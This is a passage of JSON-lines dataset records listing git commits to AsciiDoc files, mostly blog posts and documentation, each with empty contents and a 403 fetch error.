system\n","repos":"oskopek\/carcv,sk413025\/carcv,sk413025\/carcv,sk413025\/carcv,oskopek\/carcv,oskopek\/carcv,sk413025\/carcv,sk413025\/carcv,oskopek\/carcv,oskopek\/carcv,sk413025\/carcv,oskopek\/carcv","old_file":"AUTHORS.adoc","new_file":"AUTHORS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sk413025\/carcv.git\/': The requested URL 
returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6638b37c5e4aa5e1357d2ba06b9953df4d6d87f3","subject":"fixes #114 docs: Major differences and motivation vs. nanomsg","message":"fixes #114 docs: Major differences and motivation vs. nanomsg\n","repos":"nanomsg\/nng,nanomsg\/nng,nanomsg\/nng,nanomsg\/nng","old_file":"RATIONALE.adoc","new_file":"RATIONALE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nanomsg\/nng.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cb8642e7b007154de0c9acbe148befd79266221f","subject":"Update 2016-04-15-Episode-53-Drop-a-Rotary-In-It.adoc","message":"Update 2016-04-15-Episode-53-Drop-a-Rotary-In-It.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2016-04-15-Episode-53-Drop-a-Rotary-In-It.adoc","new_file":"_posts\/2016-04-15-Episode-53-Drop-a-Rotary-In-It.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"90a4e448ca41df4cef81e712e06f25d39f4f6503","subject":"Update 2016-04-25-What-is-The-Angler-Exploit-Kit.adoc","message":"Update 2016-04-25-What-is-The-Angler-Exploit-Kit.adoc","repos":"fwalloe\/infosecbriefly,fwalloe\/infosecbriefly,fwalloe\/infosecbriefly,fwalloe\/infosecbriefly","old_file":"_posts\/2016-04-25-What-is-The-Angler-Exploit-Kit.adoc","new_file":"_posts\/2016-04-25-What-is-The-Angler-Exploit-Kit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fwalloe\/infosecbriefly.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bd02ac8178d8d1b6c69e0dbb46168cf92a45bb78","subject":"fixing https:\/\/github.com\/docker\/labs\/issues\/351","message":"fixing https:\/\/github.com\/docker\/labs\/issues\/351\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch03-build-image-java-9.adoc","new_file":"developer-tools\/java\/chapters\/ch03-build-image-java-9.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ea8707f3dbda21d47482002aafc07e212211d227","subject":"fix typo in word container","message":"fix typo in word container","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch04-run-container.adoc","new_file":"developer-tools\/java\/chapters\/ch04-run-container.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dbcf878ca104a05867771c13b09ec126301e1fb3","subject":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","message":"Update 
2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7ebb56121d5347a88da9da4f9e49bd5efca076f2","subject":"Delete 2015-02-11-.adoc","message":"Delete 2015-02-11-.adoc","repos":"jabby\/jabby.github.io,jabby\/jabby.github.io,jabby\/jabby.github.io","old_file":"_posts\/2015-02-11-.adoc","new_file":"_posts\/2015-02-11-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabby\/jabby.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"29405690966b81a3a84706cdb87bb8819af6617b","subject":"Update 2015-03-19-.adoc","message":"Update 2015-03-19-.adoc","repos":"hanwencheng\/Undepth,hanwencheng\/Undepth,hanwencheng\/Undepth","old_file":"_posts\/2015-03-19-.adoc","new_file":"_posts\/2015-03-19-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hanwencheng\/Undepth.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ff062227de700f0c4d81a8b74738e77fdd30c211","subject":"Update 2018-04-02-.adoc","message":"Update 2018-04-02-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-04-02-.adoc","new_file":"_posts\/2018-04-02-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"afb0e2a179da221d9c48546c7f735cde23fd85bd","subject":"Update 2018-06-24-.adoc","message":"Update 2018-06-24-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-24-.adoc","new_file":"_posts\/2018-06-24-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6d45874c430600ada264a27c96bf84ca98b00fff","subject":"Update 2017-03-17-iphone-irkit-arduino.adoc","message":"Update 2017-03-17-iphone-irkit-arduino.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-17-iphone-irkit-arduino.adoc","new_file":"_posts\/2017-03-17-iphone-irkit-arduino.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"32ca354fcac2fda4749c748fc1406e1aa89ef525","subject":"Update 2012-12-1-Frisbeens-historie.adoc","message":"Update 
2012-12-1-Frisbeens-historie.adoc","repos":"discimport\/blog.discimport.dk,discimport\/blog.discimport.dk,discimport\/blog.discimport.dk,discimport\/blog.discimport.dk","old_file":"_posts\/2012-12-1-Frisbeens-historie.adoc","new_file":"_posts\/2012-12-1-Frisbeens-historie.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/discimport\/blog.discimport.dk.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"06744e95f19e585dbfccd8b67b10a23de99b65bd","subject":"Update 2016-07-26-this-is-something.adoc","message":"Update 2016-07-26-this-is-something.adoc","repos":"markfetherolf\/markfetherolf.github.io,markfetherolf\/markfetherolf.github.io,markfetherolf\/markfetherolf.github.io,markfetherolf\/markfetherolf.github.io","old_file":"_posts\/2016-07-26-this-is-something.adoc","new_file":"_posts\/2016-07-26-this-is-something.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markfetherolf\/markfetherolf.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be57a6a8e98fe686c0ad88e5eb6f440b84cb94ff","subject":"Update 2017-02-25-image-File-Reader.adoc","message":"Update 2017-02-25-image-File-Reader.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-25-image-File-Reader.adoc","new_file":"_posts\/2017-02-25-image-File-Reader.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f8a5a23c22e4d24f3a4cc534bc160229f73747fb","subject":"Update 2015-07-08-iOS-App-Pic-Scanner.adoc","message":"Update 2015-07-08-iOS-App-Pic-Scanner.adoc","repos":"visionui\/visionui.github.io,visionui\/visionui.github.io,visionui\/visionui.github.io","old_file":"_posts\/2015-07-08-iOS-App-Pic-Scanner.adoc","new_file":"_posts\/2015-07-08-iOS-App-Pic-Scanner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/visionui\/visionui.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"532f2ba5d4fad7ea9cab68459eaac80624d925a9","subject":"y2b create post $500 Luxury Nintendo","message":"y2b create post $500 Luxury Nintendo","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-09-16-500-Luxury-Nintendo.adoc","new_file":"_posts\/2015-09-16-500-Luxury-Nintendo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"24d486e0428fbd7971c72ebe498b9fbc2ab1d9ac","subject":"Update 2016-08-09-Santorini-map-guide.adoc","message":"Update 2016-08-09-Santorini-map-guide.adoc","repos":"danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io","old_file":"_posts\/2016-08-09-Santorini-map-guide.adoc","new_file":"_posts\/2016-08-09-Santorini-map-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/danharr\/danharr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a2d10c8c17a856b70579880e0cdf14a53333dfe2","subject":"Update 2016-5-13-Engineer-Career-Path.adoc","message":"Update 2016-5-13-Engineer-Career-Path.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-5-13-Engineer-Career-Path.adoc","new_file":"_posts\/2016-5-13-Engineer-Career-Path.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0705f8126fde6a453c9adee7013d250ccc69a60b","subject":"Update 2018-08-25-Laravel56-Response.adoc","message":"Update 2018-08-25-Laravel56-Response.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4ec8ff8c19fbb7f3b271ab89bda0141d43c8f6a5","subject":"Update 2018-08-25-Laravel56-Response.adoc","message":"Update 2018-08-25-Laravel56-Response.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1539fd665c1d3c7b8040167bf633d108dc865139","subject":"Update 2016-11-15-231000-Thursday.adoc","message":"Update 2016-11-15-231000-Thursday.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-15-231000-Thursday.adoc","new_file":"_posts\/2016-11-15-231000-Thursday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4b26f66409c5fdc89c0c1c47762f4eae26287777","subject":"Analysis Print-exec","message":"Analysis Print-exec\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Ex\u00e9cution\/Print exec.adoc","new_file":"Ex\u00e9cution\/Print exec.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5612f09671078613b1ba8139eb1e06a4ea0f7f3b","subject":"Update 2018-2-2-Web-R-T-C.adoc","message":"Update 
2018-2-2-Web-R-T-C.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-2-2-Web-R-T-C.adoc","new_file":"_posts\/2018-2-2-Web-R-T-C.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8aaeaa86ef7290d0d1efee733faf09dcd612440e","subject":"Update 2019-01-19-Vuejs-4.adoc","message":"Update 2019-01-19-Vuejs-4.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-01-19-Vuejs-4.adoc","new_file":"_posts\/2019-01-19-Vuejs-4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5886dd7b0ec022442ed6f56dd4cc561a5a94f858","subject":"Update 2018-02-27-A-Few-Farewells.adoc","message":"Update 2018-02-27-A-Few-Farewells.adoc","repos":"apoch\/blog,apoch\/blog,apoch\/blog,apoch\/blog","old_file":"_posts\/2018-02-27-A-Few-Farewells.adoc","new_file":"_posts\/2018-02-27-A-Few-Farewells.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apoch\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"605f30eb512403eceade156a067efb36ab1b2775","subject":"fix typos","message":"fix typos","repos":"bjartek\/vertx-rx,bjartek\/vertx-rx","old_file":"rx-java\/src\/main\/asciidoc\/java\/index.adoc","new_file":"rx-java\/src\/main\/asciidoc\/java\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bjartek\/vertx-rx.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"67f441237ac1a31f7cc121b1d02558d8b8ab7da5","subject":"Update 2016-01-13-Testing-html-insert.adoc","message":"Update 2016-01-13-Testing-html-insert.adoc","repos":"danen-carlson\/blog,danen-carlson\/blog,danen-carlson\/blog","old_file":"_posts\/2016-01-13-Testing-html-insert.adoc","new_file":"_posts\/2016-01-13-Testing-html-insert.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danen-carlson\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7a2947e6034bdcca52847d01497d446e68883e16","subject":"Update 2016-09-20-Java-One-2016-Day-0.adoc","message":"Update 2016-09-20-Java-One-2016-Day-0.adoc","repos":"binout\/javaonemorething,binout\/javaonemorething,binout\/javaonemorething,binout\/javaonemorething","old_file":"_posts\/2016-09-20-Java-One-2016-Day-0.adoc","new_file":"_posts\/2016-09-20-Java-One-2016-Day-0.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/binout\/javaonemorething.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e198aa5e94504ef06e27aeb93a8fb441476d4501","subject":"v0.7.5 docs update","message":"v0.7.5 docs 
update\n","repos":"SergeyPirogov\/kirk,SergeyPirogov\/kirk,SergeyPirogov\/kirk","old_file":"docs\/source\/index.adoc","new_file":"docs\/source\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SergeyPirogov\/kirk.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4aafe8d114c67cf8fd7321a27746fd21ca1e43d8","subject":"Update 2015-09-21-Aceess-Control.adoc","message":"Update 2015-09-21-Aceess-Control.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-21-Aceess-Control.adoc","new_file":"_posts\/2015-09-21-Aceess-Control.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7ac5510e37ef5015acefc4e6ab1bb1b0ba434b69","subject":"Update 2016-08-12-Why-Using-Framework.adoc","message":"Update 2016-08-12-Why-Using-Framework.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-08-12-Why-Using-Framework.adoc","new_file":"_posts\/2016-08-12-Why-Using-Framework.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"da2b7f5ee1bcce4cd4ea9cbb17526034b5cbe370","subject":"Update 2016-05-21-New-Dawn.adoc","message":"Update 2016-05-21-New-Dawn.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2016-05-21-New-Dawn.adoc","new_file":"_posts\/2016-05-21-New-Dawn.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1c1267979d8cd726ae8a040b0e8658cd356711db","subject":"Update 2016-12-25-My-title.adoc","message":"Update 2016-12-25-My-title.adoc","repos":"djmdata\/djmdata.github.io,djmdata\/djmdata.github.io,djmdata\/djmdata.github.io,djmdata\/djmdata.github.io","old_file":"_posts\/2016-12-25-My-title.adoc","new_file":"_posts\/2016-12-25-My-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/djmdata\/djmdata.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aab9e1ab0b8ecbf67c9ba59da9c23cb3e4e28b02","subject":"Update 2017-09-01-Ethereum.adoc","message":"Update 2017-09-01-Ethereum.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-01-Ethereum.adoc","new_file":"_posts\/2017-09-01-Ethereum.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3f5806e556af104b4e6b23b79485ee539dc14ec5","subject":"Add include.adoc","message":"Add 
include.adoc\n","repos":"wilhelmmatilainen\/atom-asciidoc-preview,Mogztter\/atom-asciidoc-preview,ldez\/atom-asciidoc-preview,asciidoctor\/atom-asciidoc-preview","old_file":"include.adoc","new_file":"include.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/asciidoctor\/atom-asciidoc-preview.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a11b92185df50547808ca0d5e7b2a17bec4f508f","subject":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","message":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bd379a0292eca06ba3d5e3fa99217d6327872bcc","subject":"Update 2016-12-11-My-first-post.adoc","message":"Update 2016-12-11-My-first-post.adoc","repos":"pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io","old_file":"_posts\/2016-12-11-My-first-post.adoc","new_file":"_posts\/2016-12-11-My-first-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pepite\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c671b7a47068f3ef18d713cf4fb8a4867c5216f7","subject":"Update 2015-05-14-bla.adoc","message":"Update 2015-05-14-bla.adoc","repos":"florianhofmann\/florianhofmann.github.io,florianhofmann\/florianhofmann.github.io,florianhofmann\/florianhofmann.github.io","old_file":"_posts\/2015-05-14-bla.adoc","new_file":"_posts\/2015-05-14-bla.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/florianhofmann\/florianhofmann.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a97c08f5d9ee26549a44b3bb732e1ed6532a79e1","subject":"Update 2017-02-06-lvm.adoc","message":"Update 2017-02-06-lvm.adoc","repos":"gongxiancao\/gongxiancao.github.io,gongxiancao\/gongxiancao.github.io,gongxiancao\/gongxiancao.github.io,gongxiancao\/gongxiancao.github.io","old_file":"_posts\/2017-02-06-lvm.adoc","new_file":"_posts\/2017-02-06-lvm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gongxiancao\/gongxiancao.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a63878fb31e24444c43d1d0e4e8f0da40fbaf9c4","subject":"fixed java docs example","message":"fixed java docs example\n","repos":"bjartek\/vertx-rx,bjartek\/vertx-rx","old_file":"rx-java\/src\/main\/asciidoc\/java\/index.adoc","new_file":"rx-java\/src\/main\/asciidoc\/java\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bjartek\/vertx-rx.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"11e77024b352e3b1619fd2298e713f85d82f896d","subject":"Update 2017-01-13-vue.adoc","message":"Update 
2017-01-13-vue.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-13-vue.adoc","new_file":"_posts\/2017-01-13-vue.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8ff1bd1b61eacc6fe8439ee92539846e96627c10","subject":"Removed outdated examples and keep the link to the website doc","message":"Removed outdated examples and keep the link to the website doc\n","repos":"jotak\/hawkular-metrics,tsegismont\/hawkular-metrics,jotak\/hawkular-metrics,tsegismont\/hawkular-metrics,burmanm\/hawkular-metrics,burmanm\/hawkular-metrics,ppalaga\/hawkular-metrics,mwringe\/hawkular-metrics,jotak\/hawkular-metrics,burmanm\/hawkular-metrics,tsegismont\/hawkular-metrics,mwringe\/hawkular-metrics,hawkular\/hawkular-metrics,burmanm\/hawkular-metrics,hawkular\/hawkular-metrics,pilhuhn\/rhq-metrics,tsegismont\/hawkular-metrics,pilhuhn\/rhq-metrics,pilhuhn\/rhq-metrics,mwringe\/hawkular-metrics,ppalaga\/hawkular-metrics,mwringe\/hawkular-metrics,ppalaga\/hawkular-metrics,ppalaga\/hawkular-metrics,hawkular\/hawkular-metrics,hawkular\/hawkular-metrics,jotak\/hawkular-metrics,pilhuhn\/rhq-metrics","old_file":"api\/metrics-api-jaxrs\/README.adoc","new_file":"api\/metrics-api-jaxrs\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/burmanm\/hawkular-metrics.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"03d4c7b412899293ad802b57d97812b862ff074e","subject":"add faq guide","message":"add faq guide\n","repos":"clojure\/clojure-site","old_file":"content\/guides\/faq.adoc","new_file":"content\/guides\/faq.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"ffa6bd6ef5e48ffe0580c18b072c3cd5997bcc58","subject":"Update 2020-01-31-nurse.adoc","message":"Update 2020-01-31-nurse.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2020-01-31-nurse.adoc","new_file":"_posts\/2020-01-31-nurse.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"df93c189e517f90f87f174f432eac398d4384517","subject":"PLANNER-457 SolverFactory.cloneSolverFactory() so configuring getSolverConfig() dynamically per parallel request doesn't require parsing the solver config XML each time","message":"PLANNER-457 SolverFactory.cloneSolverFactory() so configuring getSolverConfig() dynamically per parallel request doesn't require parsing the solver config XML each 
time\n","repos":"droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website,oskopek\/optaplanner-website,oskopek\/optaplanner-website,droolsjbpm\/optaplanner-website,oskopek\/optaplanner-website","old_file":"download\/releaseNotes\/releaseNotes6.4.adoc","new_file":"download\/releaseNotes\/releaseNotes6.4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oskopek\/optaplanner-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"494f5bd66d711512766b58616b8ce164918bab5f","subject":"Update 2010-11-03-Authentification-LDAP-avec-Play-framework.adoc","message":"Update 2010-11-03-Authentification-LDAP-avec-Play-framework.adoc","repos":"jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io","old_file":"_posts\/2010-11-03-Authentification-LDAP-avec-Play-framework.adoc","new_file":"_posts\/2010-11-03-Authentification-LDAP-avec-Play-framework.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jcsirot\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"26ac897598fe04b1bfc2183c9ec259e9f64048c7","subject":"Fix indentation in the manpage","message":"Fix indentation in the 